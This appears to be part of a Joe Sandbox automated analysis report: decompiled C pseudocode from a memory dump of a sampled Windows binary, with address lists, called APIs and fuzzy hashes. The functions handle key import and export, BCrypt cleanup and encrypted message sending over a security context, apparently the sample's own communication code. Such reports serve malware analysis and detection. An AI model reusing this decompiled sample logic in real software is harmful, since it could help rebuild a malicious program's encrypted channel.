                        													if(_t880 == 0) {
                        														goto L117;
                        													}
                        													E0040618C( &(_t954[0x291]), _t961 - 0x134, 0x80);
                        													_t890 = E0040372E(__eflags,  *(_t961 - 4),  *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x10)), _t961 - 0x1c4,  &(_t954[0x292]), _t961 - 0x1d0, _t961 - 0x1cc, _t961 - 0x208, _t961 - 0x204);
                        													__eflags = _t890;
                        													if(_t890 == 0) {
                        														goto L117;
                        													}
                        													_t904 = 0xffffffff;
                        													goto L43;
                        												}
                        												__eflags = _t904;
                        												if(_t904 >= 0) {
                        													break;
                        												}
                        												E00406259( *((intOrPtr*)(_t961 - 0x780)), 0x186a0);
                        												_t947 =  *((intOrPtr*)(_t961 - 0x780));
                        												 *_t947 = 0x80;
                        												 *((char*)(_t947 + 3)) = 1;
                        												 *((char*)(_t947 + 4)) = 3;
                        												 *((char*)(_t947 + 5)) = 1;
                        												 *((char*)(_t947 + 9)) =  *(_t961 - 0x18);
                        												 *((char*)(_t947 + 0xf)) = 0x12;
                        												E00406270(0x40807e, 0xa, _t961 - 0x6c8);
                        												E00406368(_t961 - 0x6c8, 0xa, _t947 + 0x10);
                        												 *((char*)(_t947 + 0x20)) = 0x3a;
                        												E00406270(0x408074, 0xffffffff, _t961 - 0x720);
                        												 *((intOrPtr*)(_t947 + 0xf)) =  *((intOrPtr*)(_t947 + 0xf)) + E00406492(__eflags, _t961 - 0x720);
                        												E004061D2(_t961 - 0x720, _t947 + 0x21, _t773);
                        												E00403616( *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x200)),  *((intOrPtr*)(_t961 - 0x1f8)),  *((intOrPtr*)(_t961 - 0x1d0)), _t947 + 5, 1,  *((intOrPtr*)(_t961 - 0x208)));
                        												E00404224(__eflags,  *((intOrPtr*)(_t961 - 0x764)),  *((intOrPtr*)(_t961 - 0x780)), 0x202, 0,  *((intOrPtr*)(_t961 + 0x10)));
                        												_t780 = E00404554( *((intOrPtr*)(_t961 - 0x764)),  *(_t961 - 0x77c), 0x202,  *((intOrPtr*)(_t961 + 0x10)), 0x64);
                        												_t948 =  *(_t961 - 0x77c);
                        												__eflags = _t780;
                        												if(_t780 != 0) {
                        													goto L117;
                        												}
                        												__eflags = _t948[4] - 3;
                        												if(__eflags != 0) {
                        													goto L117;
                        												}
                        												_t782 = E00403697(__eflags,  *((intOrPtr*)(_t961 - 8)),  *((intOrPtr*)(_t961 - 0x1fc)),  *((intOrPtr*)(_t961 - 0x1f4)),  *((intOrPtr*)(_t961 - 0x1cc)),  &(_t948[5]), 3,  *((intOrPtr*)(_t961 - 0x204)));
                        												__eflags = _t782;
                        												if(_t782 == 0) {
                        													goto L117;
                        												}
                        												__eflags = _t948[5] - 4;
                        												if(_t948[5] == 4) {
                        													E004061D2(_t961 - 8,  *((intOrPtr*)(_t961 + 0x1c)), 4);
                        													E004061D2(_t961 - 0x200,  *((intOrPtr*)(_t961 + 0x20)), 0x10);
                        													E004061D2(_t961 - 0x1d0,  *((intOrPtr*)(_t961 + 0x20)) + 0x10, 8);
                        													E004061D2(_t961 - 0x208,  *((intOrPtr*)(_t961 + 0x24)), 8);
                        													E004061D2(_t961 - 0x18,  *((intOrPtr*)(_t961 + 0x28)), 4);
                        													 *(_t961 - 0x788) = 1;
                        												}
                        											}
                        											break;
                        										}
                        										__eflags =  *(_t961 - 0x714);
                        										if( *(_t961 - 0x714) == 0) {
                        											continue;
                        										}
                        										goto L12;
                        									}
                        									__eflags = _t580 - 0x1f;
                        									if(__eflags != 0) {
                        										continue;
                        									}
                        									goto L9;
                        								}
                        								__eflags = _t580 - 0x17;
                        								if(_t580 != 0x17) {
                        									continue;
                        								}
                        								goto L7;
                        							}
                        							__eflags = _t580 - 7;
                        							if(_t580 != 7) {
                        								continue;
                        							}
                        							goto L5;
                        						}
                        						__eflags = _t580 - 7;
                        						if(_t580 != 7) {
                        							continue;
                        						}
                        						goto L3;
                        					}
                        					L119:
                        					 *(_t961 - 0x24) = 0xc;
                        					if( *(_t961 - 0x788) != 1) {
                        						 *(_t961 - 0x24) = 0xe;
                        					}
                        					E0040609E(_t961 - 0x238, _t961 - 0x238, 0,  *(_t961 - 0x24));
                        					 *(_t961 - 0x24) = 8;
                        					 *(_t961 - 0x2c) = 4;
                        					if( *(_t961 - 0x788) != 1) {
                        						 *(_t961 - 0x24) = 0xe;
                        						 *(_t961 - 0x2c) = 0;
                        					}
                        					E0040605D(_t961 - 0x200, _t961 - 0x200,  *(_t961 - 0x2c),  *(_t961 - 0x24));
                        					CryptReleaseContext( *(_t961 - 4), 0);
                        					_t968 =  *(_t961 - 0x788) - 1;
                        					if( *(_t961 - 0x788) != 1) {
                        						_push(0);
                        						_push( *((intOrPtr*)(_t961 - 8)));
                        						 *((intOrPtr*)(E00406788(_t968, E00406698("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                        					}
                        					_push(0);
                        					_push( *((intOrPtr*)(_t961 - 0xc)));
                        					 *((intOrPtr*)(E00406788(_t968, E00406698("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                        					_push(0);
                        					_push( *((intOrPtr*)(_t961 - 0x10)));
                        					 *((intOrPtr*)(E00406788(_t968, E00406698("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                        					E004061D2(_t961 - 0x764,  *((intOrPtr*)(_t961 + 0x18)), 4);
                        					E00404681(_t961 - 0x23c);
                        					E00404681(_t961 - 0x784);
                        					E00404681(_t961 - 0x77c);
                        					E00404681(_t961 - 0x780);
                        					return  *(_t961 - 0x788);
                        				}
                        			}









































































                        0x00402677
                        0x00402677
                        0x00402677
                        0x00000000
                        0x0040269a
                        0x00401466
                        0x00401469
                        0x0040146e
                        0x00401475
                        0x00401480
                        0x00401480
                        0x00401487
                        0x00401492
                        0x00401492
                        0x00401499
                        0x004014a4
                        0x004014a4
                        0x004014ab
                        0x004014b6
                        0x004014dd
                        0x004014e2
                        0x004014e2
                        0x004014e4
                        0x00000000
                        0x00000000
                        0x004014ea
                        0x004014f1
                        0x00401500
                        0x00401500
                        0x00401507
                        0x00401dc6
                        0x00401dcd
                        0x00402311
                        0x00402318
                        0x0040248c
                        0x00402493
                        0x00402677
                        0x00402677
                        0x00402677
                        0x00000000
                        0x0040267d
                        0x00402677
                        0x004024b7
                        0x004024b9
                        0x00000000
                        0x00000000
                        0x004024d1
                        0x004024d6
                        0x004024ec
                        0x004024f1
                        0x004024f3
                        0x00000000
                        0x00000000
                        0x00402505
                        0x0040250a
                        0x0040250c
                        0x00000000
                        0x00000000
                        0x00402512
                        0x00402518
                        0x0040251f
                        0x00402526
                        0x00402539
                        0x00402544
                        0x00402545
                        0x00402547
                        0x00402549
                        0x0040254f
                        0x00402550
                        0x00402552
                        0x00402557
                        0x00402559
                        0x00000000
                        0x00000000
                        0x0040256f
                        0x00402574
                        0x00402576
                        0x00000000
                        0x00000000
                        0x0040257c
                        0x0040257f
                        0x00402585
                        0x00402587
                        0x00402587
                        0x00402587
                        0x00402590
                        0x00402595
                        0x0040259c
                        0x00000000
                        0x00000000
                        0x0040259e
                        0x004025a8
                        0x004025ad
                        0x004025b0
                        0x00000000
                        0x00000000
                        0x004025bb
                        0x004025c4
                        0x004025c7
                        0x00000000
                        0x00402672
                        0x004025db
                        0x004025fe
                        0x00402600
                        0x00402609
                        0x0040260b
                        0x0040260d
                        0x0040261e
                        0x00402623
                        0x00402629
                        0x0040263a
                        0x0040263f
                        0x00402645
                        0x0040264b
                        0x00402650
                        0x00402653
                        0x0040266b
                        0x00402677
                        0x00402677
                        0x00402677
                        0x00000000
                        0x0040267d
                        0x00402677
                        0x00000000
                        0x00402526
                        0x0040237c
                        0x00402381
                        0x00402383
                        0x00000000
                        0x00000000
                        0x00402394
                        0x00402399
                        0x0040239f
                        0x004023a2
                        0x004023a6
                        0x004023aa
                        0x004023ae
                        0x004023b2
                        0x004023cc
                        0x004023cc
                        0x004023cf
                        0x00000000
                        0x00000000
                        0x004023c3
                        0x004023cb
                        0x004023cb
                        0x004023cb
                        0x004023de
                        0x00402400
                        0x0040241b
                        0x00402436
                        0x0040243b
                        0x00402441
                        0x00402443
                        0x00000000
                        0x00000000
                        0x00402449
                        0x0040244d
                        0x00000000
                        0x00000000
                        0x00402470
                        0x00402475
                        0x00402477
                        0x00000000
                        0x00000000
                        0x0040247d
                        0x00402481
                        0x00000000
                        0x00000000
                        0x00402677
                        0x00402677
                        0x00402677
                        0x00000000
                        0x0040267d
                        0x00402677
                        0x00401dd3
                        0x00401dda
                        0x00401de1
                        0x004022fa
                        0x004022fa
                        0x004022fe
                        0x00000000
                        0x00000000
                        0x00401df0
                        0x00401e0d
                        0x00401e29
                        0x00401e3e
                        0x00401e50
                        0x00401e62
                        0x00401e67
                        0x00401f4d
                        0x00401f4d
                        0x00401f51
                        0x00000000
                        0x00000000
                        0x00401e78
                        0x00401e7d
                        0x00401eb3
                        0x00401eb8
                        0x00401ebf
                        0x00401ec1
                        0x00401f2b
                        0x00401f2b
                        0x00401f2f
                        0x00401f48
                        0x00401f31
                        0x00401f34
                        0x00401f39
                        0x00401f39
                        0x00000000
                        0x00401f2f
                        0x00401ed7
                        0x00401ef5
                        0x00401efa
                        0x00401f26
                        0x00401f26
                        0x00401f29
                        0x00000000
                        0x00000000
                        0x00401efe
                        0x00401f06
                        0x00401f0e
                        0x00000000
                        0x00401f24
                        0x00401f10
                        0x00401f18
                        0x00401f1a
                        0x00401f1a
                        0x00401f21
                        0x00401f21
                        0x00000000
                        0x00401f26
                        0x00401f57
                        0x004022ed
                        0x004022ed
                        0x004022f1
                        0x00000000
                        0x00000000
                        0x00401f6c
                        0x00401f71
                        0x00401f72
                        0x00401f96
                        0x00401f98
                        0x00000000
                        0x00000000
                        0x00402002
                        0x00402004
                        0x004022b4
                        0x004022c6
                        0x004022cb
                        0x004022ce
                        0x004022d1
                        0x004022e4
                        0x004022e9
                        0x004022eb
                        0x00402309
                        0x00000000
                        0x00402309
                        0x00000000
                        0x004022eb
                        0x00402015
                        0x0040201a
                        0x00402020
                        0x00402026
                        0x00402029
                        0x0040202d
                        0x00402034
                        0x00402054
                        0x0040206f
                        0x0040208a
                        0x0040208f
                        0x00402095
                        0x00402097
                        0x00000000
                        0x00000000
                        0x0040209d
                        0x004020a1
                        0x00000000
                        0x00000000
                        0x004020c4
                        0x004020c9
                        0x004020cb
                        0x00000000
                        0x00000000
                        0x004020d1
                        0x004020d5
                        0x00000000
                        0x00000000
                        0x004020e6
                        0x004020eb
                        0x004020f1
                        0x004020f7
                        0x004020fa
                        0x004020fe
                        0x00402105
                        0x0040211e
                        0x00402123
                        0x00402126
                        0x00402126
                        0x00402128
                        0x00402148
                        0x00402163
                        0x00402168
                        0x0040216f
                        0x00402176
                        0x0040217d
                        0x00402183
                        0x00402194
                        0x00402199
                        0x004021ac
                        0x004021b7
                        0x004021b8
                        0x004021ba
                        0x004021bc
                        0x004021c2
                        0x004021c3
                        0x004021c5
                        0x004021ca
                        0x004021cc
                        0x00000000
                        0x00000000
                        0x004021d2
                        0x004021d4
                        0x00000000
                        0x00000000
                        0x004021ea
                        0x004021ef
                        0x004021f1
                        0x00000000
                        0x00000000
                        0x004021fd
                        0x00402200
                        0x00402203
                        0x0040220a
                        0x00000000
                        0x00000000
                        0x00402218
                        0x00402224
                        0x00402229
                        0x00402233
                        0x00402235
                        0x00402235
                        0x00402237
                        0x00000000
                        0x00000000
                        0x0040223d
                        0x004022a9
                        0x004022a9
                        0x004022ad
                        0x00000000
                        0x00000000
                        0x0040224a
                        0x0040224c
                        0x004022a0
                        0x004022a0
                        0x004022a6
                        0x004022a6
                        0x004022a6
                        0x00000000
                        0x004022a6
                        0x0040226c
                        0x00402271
                        0x00402273
                        0x00000000
                        0x00000000
                        0x00402279
                        0x0040227f
                        0x00000000
                        0x00000000
                        0x00402281
                        0x00402287
                        0x00000000
                        0x00000000
                        0x0040228d
                        0x00402296
                        0x0040229b
                        0x0040229d
                        0x0040229d
                        0x0040229d
                        0x00000000
                        0x0040229d
                        0x004022af
                        0x00000000
                        0x00402199
                        0x004022f7
                        0x004022f7
                        0x004022f7
                        0x004022f7
                        0x0040150d
                        0x00401522
                        0x00401525
                        0x00401528
                        0x0040153b
                        0x0040153b
                        0x0040153f
                        0x00000000
                        0x00000000
                        0x00401532
                        0x00401533
                        0x00401535
                        0x00401537
                        0x00401537
                        0x00401538
                        0x00401538
                        0x00401538
                        0x00401538
                        0x00401541
                        0x00401558
                        0x00401567
                        0x0040156c
                        0x0040156e
                        0x00000000
                        0x00000000
                        0x0040158c
                        0x00401591
                        0x00401597
                        0x0040164d
                        0x0040164d
                        0x00401650
                        0x00000000
                        0x00000000
                        0x00401652
                        0x00401656
                        0x004015ac
                        0x004015ac
                        0x004015ae
                        0x00000000
                        0x00000000
                        0x004015b4
                        0x004015c4
                        0x004015c9
                        0x004015cb
                        0x00000000
                        0x00000000
                        0x004015d1
                        0x004015e1
                        0x004015e6
                        0x004015e8
                        0x00000000
                        0x00000000
                        0x004015ee
                        0x004015fe
                        0x00401603
                        0x00401605
                        0x00000000
                        0x00000000
                        0x0040160c
                        0x0040160e
                        0x00401610
                        0x0040161c
                        0x00401621
                        0x00401623
                        0x00000000
                        0x00000000
                        0x0040162c
                        0x0040163c
                        0x00401641
                        0x00401643
                        0x00000000
                        0x00000000
                        0x00401649
                        0x0040164c
                        0x0040164c
                        0x00000000
                        0x0040164c
                        0x00000000
                        0x00401656
                        0x00401c17
                        0x00401c17
                        0x00401c1a
                        0x00000000
                        0x00000000
                        0x00401661
                        0x004016c4
                        0x004016c9
                        0x004016cb
                        0x00401bfd
                        0x00401c0f
                        0x00401c14
                        0x00401c14
                        0x00401c14
                        0x00000000
                        0x00401c14
                        0x004016f2
                        0x004016f7
                        0x004016f8
                        0x004016fa
                        0x00401701
                        0x00401707
                        0x0040170c
                        0x00401718
                        0x0040171d
                        0x00401723
                        0x0040173d
                        0x0040175b
                        0x0040177a
                        0x0040177f
                        0x00401781
                        0x0040267f
                        0x0040268b
                        0x00402690
                        0x00000000
                        0x00402690
                        0x00401787
                        0x0040178d
                        0x004017a3
                        0x004017a8
                        0x004017af
                        0x004017b6
                        0x004017bf
                        0x004017c9
                        0x004017d3
                        0x00401803
                        0x00401808
                        0x00401809
                        0x00401817
                        0x0040181c
                        0x00401834
                        0x00401840
                        0x00401846
                        0x00401850
                        0x00401850
                        0x00401850
                        0x00401852
                        0x00000000
                        0x00000000
                        0x0040184a
                        0x0040184b
                        0x0040184d
                        0x0040184f
                        0x0040184f
                        0x0040184d
                        0x00401854
                        0x0040186c
                        0x0040188b
                        0x00401890
                        0x004018a3
                        0x004018ab
                        0x004018b2
                        0x004018b3
                        0x004018b5
                        0x004018c0
                        0x004018c1
                        0x004018c3
                        0x004018c5
                        0x004018ca
                        0x004018d4
                        0x004018de
                        0x004018e8
                        0x004018f2
                        0x004018fc
                        0x0040190c
                        0x0040190e
                        0x00401927
                        0x0040192c
                        0x0040192e
                        0x00401939
                        0x00401940
                        0x00401947
                        0x00401948
                        0x0040194a
                        0x00401962
                        0x0040196f
                        0x00401974
                        0x0040197a
                        0x00401980
                        0x00401983
                        0x00401987
                        0x00401990
                        0x00401993
                        0x004019ad
                        0x004019b8
                        0x004019be
                        0x004019c8
                        0x004019d2
                        0x004019d7
                        0x004019d8
                        0x004019e0
                        0x004019e1
                        0x004019e3
                        0x004019eb
                        0x004019ec
                        0x004019f4
                        0x004019f5
                        0x00401a10
                        0x00401a1d
                        0x00401a22
                        0x00401a2c
                        0x00401a36
                        0x00401a50
                        0x00401a55
                        0x00401a57
                        0x00401a5f
                        0x00401a60
                        0x00401a62
                        0x00401a6a
                        0x00401a71
                        0x00401a72
                        0x00401a74
                        0x00401a8c
                        0x00401aa1
                        0x00401aba
                        0x00401aca
                        0x00401aec
                        0x00401b07
                        0x00401b22
                        0x00401b27
                        0x00401b2d
                        0x00401b2f
                        0x00000000
                        0x00000000
                        0x00401b35
                        0x00401b39
                        0x00000000
                        0x00000000
                        0x00401b5c
                        0x00401b61
                        0x00401b63
                        0x00000000
                        0x00000000
                        0x00401b69
                        0x00401b6d
                        0x00000000
                        0x00000000
                        0x00401b93
                        0x00401b98
                        0x00401b9a
                        0x00000000
                        0x00000000
                        0x00401bb3
                        0x00401beb
                        0x00401bf0
                        0x00401bf2
                        0x00000000
                        0x00000000
                        0x00401bf8
                        0x00000000
                        0x00401bf8
                        0x00401c20
                        0x00401c22
                        0x00000000
                        0x00000000
                        0x00401c33
                        0x00401c38
                        0x00401c3e
                        0x00401c41
                        0x00401c45
                        0x00401c49
                        0x00401c50
                        0x00401c53
                        0x00401c65
                        0x00401c77
                        0x00401c7c
                        0x00401c8e
                        0x00401c9f
                        0x00401cae
                        0x00401cd4
                        0x00401cef
                        0x00401d0a
                        0x00401d0f
                        0x00401d15
                        0x00401d17
                        0x00000000
                        0x00000000
                        0x00401d1d
                        0x00401d21
                        0x00000000
                        0x00000000
                        0x00401d48
                        0x00401d4d
                        0x00401d4f
                        0x00000000
                        0x00000000
                        0x00401d55
                        0x00401d59
                        0x00401d68
                        0x00401d7c
                        0x00401d8e
                        0x00401d9f
                        0x00401dad
                        0x00401db2
                        0x00401db2
                        0x00401d59
                        0x00000000
                        0x00401507
                        0x004014f3
                        0x004014fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004014fa
                        0x004014ad
                        0x004014b0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004014b0
                        0x0040149b
                        0x0040149e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040149e
                        0x00401489
                        0x0040148c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040148c
                        0x00401477
                        0x0040147a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040147a
                        0x004026a7
                        0x004026a7
                        0x004026b5
                        0x004026b7
                        0x004026b7
                        0x004026ca
                        0x004026cf
                        0x004026d6
                        0x004026e4
                        0x004026e6
                        0x004026ed
                        0x004026ed
                        0x00402701
                        0x0040270b
                        0x00402710
                        0x00402717
                        0x00402719
                        0x0040271b
                        0x00402733
                        0x00402733
                        0x00402735
                        0x00402737
                        0x0040274f
                        0x00402751
                        0x00402753
                        0x0040276b
                        0x00402779
                        0x00402785
                        0x00402791
                        0x0040279d
                        0x004027a9
                        0x004027b8
                        0x004027b8

                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00401558
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040158C
                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,00000000,?), ref: 0040270B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Crypt$BinaryString$ContextRelease
                        • String ID: BCryptCloseAlgorithmProvider$bcrypt.dll
                        • API String ID: 1374739491-1199799005
                        • Opcode ID: 8591abb3ecadd83ac1f226f4c6231a013c7524e1cdf5623020778fc5a744ab7e
                        • Instruction ID: 31189be89cb874e46f513b9156a36f8142918e998cd3954bc8b6009c3e99f646
                        • Opcode Fuzzy Hash: 8591abb3ecadd83ac1f226f4c6231a013c7524e1cdf5623020778fc5a744ab7e
                        • Instruction Fuzzy Hash: 8C214F70D40218AADF21ABE48D0ABCD73B8AB45708F5048AAF609720C1DA7E5A548F29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00404224(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                        				char _v16;
                        				char _v20;
                        				char _v24;
                        				void* _v28;
                        				char* _v32;
                        				long _v36;
                        				void* _v40;
                        				void* _v44;
                        				void* _v48;
                        				void* _v52;
                        				intOrPtr _v56;
                        				intOrPtr _v60;
                        				char _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				intOrPtr _v76;
                        				char _v80;
                        				intOrPtr _v84;
                        				char _v88;
                        				char _v92;
                        				void* _t53;
                        				void* _t58;
                        				intOrPtr _t80;
                        				void* _t86;
                        
                        				_t53 = E00406259( &_v92,  &_v16 - _t86);
                        				while(_a12 > 0) {
                        					_push( &_v24);
                        					_push(4);
                        					_push(_a20);
                        					L00406AAE();
                        					_t53 = VirtualAlloc(0, _v24 + _v16 + _v20, 0x3000, 4);
                        					if(_t53 != 0) {
                        						_v28 = _t53;
                        						_t58 = _t53 + _v24;
                        						_t80 = _a12;
                        						if(_v16 <= _t80) {
                        							_t80 = _v16;
                        						}
                        						_v92 = _v92 + _t80;
                        						_a12 = _a12 - _t80;
                        						E004061D2(_a8 + _v92, _t58, _t80);
                        						E004061D2( &_v24,  &_v88, 4);
                        						_v84 = 7;
                        						E004061D2( &_v28,  &_v80, 4);
                        						_v76 = _t80;
                        						_v72 = 1;
                        						_v68 = _v28 + _v24;
                        						E004061D2( &_v20,  &_v64, 4);
                        						_v60 = 6;
                        						_v56 = _v28 + _v24 + _t80;
                        						_v52 = 0;
                        						_v48 = 0;
                        						_v44 = 0;
                        						_v32 =  &_v88;
                        						_v40 = 0;
                        						_v36 = 4;
                        						_push(0);
                        						_push( &_v40);
                        						_push(0);
                        						_push(_a20);
                        						L00406A84();
                        						E00405E81(_a4, _v28, _v88 + _v76 + _v64, _a16);
                        						_t53 = E00404681( &_v28);
                        						continue;
                        					}
                        					break;
                        				}
                        				return _t53;
                        			}



























                        0x00404238
                        0x00404348
                        0x00404245
                        0x00404246
                        0x00404248
                        0x0040424b
                        0x00404263
                        0x0040426a
                        0x00404270
                        0x00404273
                        0x00404276
                        0x0040427c
                        0x0040427e
                        0x0040427e
                        0x00404287
                        0x0040428a
                        0x00404290
                        0x0040429f
                        0x004042a4
                        0x004042b5
                        0x004042ba
                        0x004042bd
                        0x004042ca
                        0x004042d7
                        0x004042dc
                        0x004042eb
                        0x004042ee
                        0x004042f5
                        0x004042fc
                        0x00404306
                        0x00404309
                        0x00404310
                        0x00404317
                        0x0040431c
                        0x0040431d
                        0x0040431f
                        0x00404322
                        0x0040433a
                        0x00404343
                        0x00000000
                        0x00404343
                        0x00000000
                        0x0040426a
                        0x00404356

                        APIs
                        • QueryContextAttributesA.SECUR32(?,00000004,?,?,?,?,?,?), ref: 0040424B
                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,00000004,?,?,?,?,?,?), ref: 00404263
                        • EncryptMessage.SECUR32(?,00000000,?,00000000,?,?,00000004,?,?,00000004,?,?,00000004,?,?,?), ref: 00404322
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: AllocAttributesContextEncryptMessageQueryVirtual
                        • String ID:
                        • API String ID: 2600646408-0
                        • Opcode ID: 24e933c5522e045bb1caa654d8c18fe6e22fcd8d17d2b23cb9be742630cc3813
                        • Instruction ID: 20b95c9a18c18732aa9a6186bd21003c4812121d894bb9045ca6f44c47b83b47
                        • Opcode Fuzzy Hash: 24e933c5522e045bb1caa654d8c18fe6e22fcd8d17d2b23cb9be742630cc3813
                        • Instruction Fuzzy Hash: 7041BCB1D0020DABDF04DFD5C845BEEB7B9EF44308F14412AE611B6281D7789A55CB69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E00403BB4(long* _a4, BYTE* _a8, intOrPtr _a12) {
                        				long* _v8;
                        				char _v12;
                        				char _v16;
                        				char _v125;
                        				char _v268;
                        				char* _t18;
                        				void* _t22;
                        				void* _t25;
                        
                        				E00406259( &_v268,  &_v16 - _t25);
                        				CryptImportKey(_a4, _a8, 0x190, 0, 1,  &_v8);
                        				_v12 = 0x90;
                        				_push( &_v12);
                        				_t18 =  &_v268;
                        				_push(_t18);
                        				_push(0);
                        				_push(6);
                        				_push(0);
                        				_push(_v8);
                        				L004069CA();
                        				E0040618C( &_v125, _a12, 0x80);
                        				CryptDestroyKey(_v8);
                        				_t22 = _t18;
                        				return _t22;
                        			}











                        0x00403bcb
                        0x00403be3
                        0x00403be8
                        0x00403bf2
                        0x00403bf3
                        0x00403bf9
                        0x00403bfa
                        0x00403bfc
                        0x00403bfe
                        0x00403c00
                        0x00403c03
                        0x00403c15
                        0x00403c1d
                        0x00403c22
                        0x00403c27

                        APIs
                        • CryptImportKey.ADVAPI32(?,?,00000190,00000000,00000001,?,?,?,00408566,?), ref: 00403BE3
                        • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,?,?,?,00000190,00000000,00000001,?,?,?,00408566,?), ref: 00403C03
                        • CryptDestroyKey.ADVAPI32(?,?,?,00000080,00000000,?,00000000,00000006,00000000,?,?,?,?,00000190,00000000,00000001), ref: 00403C1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Crypt$DestroyExportImport
                        • String ID:
                        • API String ID: 2547721435-0
                        • Opcode ID: c573997427dfe8a682f9e59e6c6e08a0a16756de141bc0ca02fe929365c03c4b
                        • Instruction ID: d87df2899f42a0005540488748e121e03d4a28e35cd320b4e93aa70838f0d01d
                        • Opcode Fuzzy Hash: c573997427dfe8a682f9e59e6c6e08a0a16756de141bc0ca02fe929365c03c4b
                        • Instruction Fuzzy Hash: 91016DB2A00208BADB11EB91CC42FDF776CEB40714F10006AB606B50D1DAB5A6689B68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E00404359(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                        				void* _v8;
                        				void* _v12;
                        				char _v16;
                        				long _v20;
                        				char* _v24;
                        				long _v28;
                        				void* _v32;
                        				void* _v36;
                        				void* _v40;
                        				void* _v44;
                        				void* _v48;
                        				void* _v52;
                        				void* _v56;
                        				void* _v60;
                        				void* _v64;
                        				void* _v68;
                        				char _v72;
                        				signed int _v76;
                        				char _v80;
                        				signed int _v84;
                        				void* _v88;
                        				void* _t71;
                        				void* _t77;
                        				signed int _t78;
                        				signed int _t86;
                        				signed int _t88;
                        				signed int _t92;
                        				intOrPtr _t101;
                        				signed int* _t102;
                        				void* _t103;
                        				void* _t104;
                        
                        				E00406259( &_v88,  &_v16 - _t104);
                        				E00406259(_a8, 4);
                        				_t101 = _a8;
                        				_v20 = 0x8000;
                        				_t71 = VirtualAlloc(0, _v20, 0x3000, 4);
                        				if(_t71 == 0) {
                        					L28:
                        					E00404681(_a8);
                        					_v88 = 0;
                        					goto L29;
                        				} else {
                        					_v8 = _t71;
                        					goto L2;
                        					do {
                        						do {
                        							L2:
                        							if(_v12 == 0 || _v84 == 0x80090318) {
                        								while(1) {
                        									_t77 = _v8 + _v12;
                        									_t96 = _v20 != _v12;
                        									if(_v20 != _v12) {
                        										break;
                        									}
                        									_v20 = _v20 + 0x8000;
                        									if(E00404618( &_v8, _v12, _v20) == 0) {
                        										goto L28;
                        									} else {
                        										continue;
                        									}
                        								}
                        								_t78 = E00405F54(__eflags, _a4, _t77, _t96, 0);
                        								__eflags = _t78;
                        								if(_t78 <= 0) {
                        									goto L28;
                        								}
                        								_t20 =  &_v12;
                        								 *_t20 = _v12 + _t78;
                        								__eflags =  *_t20;
                        							}
                        							E004061D2( &_v12,  &_v80, 4);
                        							_v76 = 1;
                        							E004061D2( &_v8,  &_v72, 4);
                        							_v68 = 0;
                        							_v64 = 0;
                        							_v60 = 0;
                        							_v56 = 0;
                        							_v52 = 0;
                        							_v48 = 0;
                        							_v44 = 0;
                        							_v40 = 0;
                        							_v36 = 0;
                        							_v24 =  &_v80;
                        							_v32 = 0;
                        							_v28 = 4;
                        							_push(0);
                        							_push(0);
                        							_t86 =  &_v32;
                        							_push(_t86);
                        							_push(_a12);
                        							L00406A78();
                        							_v84 = _t86;
                        							__eflags = _v84 - 0x80090318;
                        						} while (__eflags == 0);
                        						__eflags = _v84 - 0x90317;
                        						if(_v84 == 0x90317) {
                        							L14:
                        							_v12 = 0;
                        							_t92 = 1;
                        							while(1) {
                        								__eflags = _t92 - 3;
                        								if(_t92 > 3) {
                        									goto L26;
                        								}
                        								_t102 = _t103 + _t92 * 0xc - 0x4c;
                        								__eflags = _t102[1] - 1;
                        								if(_t102[1] != 1) {
                        									L20:
                        									__eflags = _t102[1] - 5;
                        									if(_t102[1] == 5) {
                        										__eflags = _t102[2];
                        										if(_t102[2] != 0) {
                        											__eflags =  *_t102;
                        											if( *_t102 != 0) {
                        												_t59 =  &_v12;
                        												 *_t59 = _v12 +  *_t102;
                        												__eflags =  *_t59;
                        												_v84 = 0x90312;
                        												E004061D2(_t102[2], _v8 + _v12,  *_t102);
                        											}
                        										}
                        									}
                        									L24:
                        									_t92 = _t92 + 1;
                        									__eflags = _t92;
                        									continue;
                        								}
                        								__eflags = _t102[2];
                        								if(_t102[2] == 0) {
                        									goto L20;
                        								}
                        								__eflags =  *_t102;
                        								if( *_t102 == 0) {
                        									goto L20;
                        								}
                        								_t88 = E004045E2(_t101, _v88, _t102[2],  *_t102);
                        								__eflags = _t88;
                        								if(_t88 == 0) {
                        									goto L28;
                        								}
                        								_v88 = _v88 +  *_t102;
                        								goto L24;
